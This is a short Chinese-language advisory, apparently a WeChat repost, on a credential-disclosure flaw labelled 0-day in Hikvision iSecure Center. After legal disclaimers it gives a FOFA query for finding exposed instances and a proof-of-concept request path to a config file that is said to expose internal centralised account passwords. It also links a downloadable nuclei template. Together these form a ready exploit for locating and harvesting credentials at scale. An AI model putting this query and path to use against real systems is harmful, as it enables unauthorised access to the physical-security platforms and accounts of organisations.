免责声明
本文章仅用于信息安全防御技术分享,因用于其他用途而产生不良后果,作者不承担任何法律责任,请严格遵循中华人民共和国相关法律法规,禁止做一切违法犯罪行为。
由于传播、利用本公众号所发布的而造成的任何直接或者间接的后果及损失,均由使用者本人承担。威零安全实验室公众号及原文章作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!
漏洞描述
海康威视综合安防管理平台信息泄露(内网集权账户密码)漏洞
HIKVISION iSecure Center综合安防管理平台是一套“集成化”、“智能化”的平台,通过接入视频监控、一卡通、停车场、报警检测等系统的设备,海康威视综合安防管理平台信息存在信息泄露(内网集权账户密码)漏洞,可以通过解密软件,解密用户名密码。
漏洞影响
HIKVISION iSecure Center综合安防管理平台,版本不详
![海康威视综合安防管理平台信息泄露[0 day]](http://cn-sec.com/wp-content/uploads/2023/10/6-1697868106.png "海康威视综合安防管理平台信息泄露[0 day]")
Fofa搜索语句
app="HIKVISION-综合安防管理平台"
![海康威视综合安防管理平台信息泄露[0 day]](http://cn-sec.com/wp-content/uploads/2023/10/1-1697868106.png "海康威视综合安防管理平台信息泄露[0 day]")
漏洞复现
Poc:
/portal/conf/config.properties
![海康威视综合安防管理平台信息泄露[0 day]](http://cn-sec.com/wp-content/uploads/2023/10/9-1697868106.png "海康威视综合安防管理平台信息泄露[0 day]")
存在漏洞,可以通过解密软件,解密用户名密码。
nuclei poc
hikvision-disclosure.yaml
https://www.aliyundrive.com/s/yLMdpepsG5G
提取码: u7q4
原文始发于微信公众号(威零安全实验室):海康威视综合安防管理平台信息泄露[0 day]
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论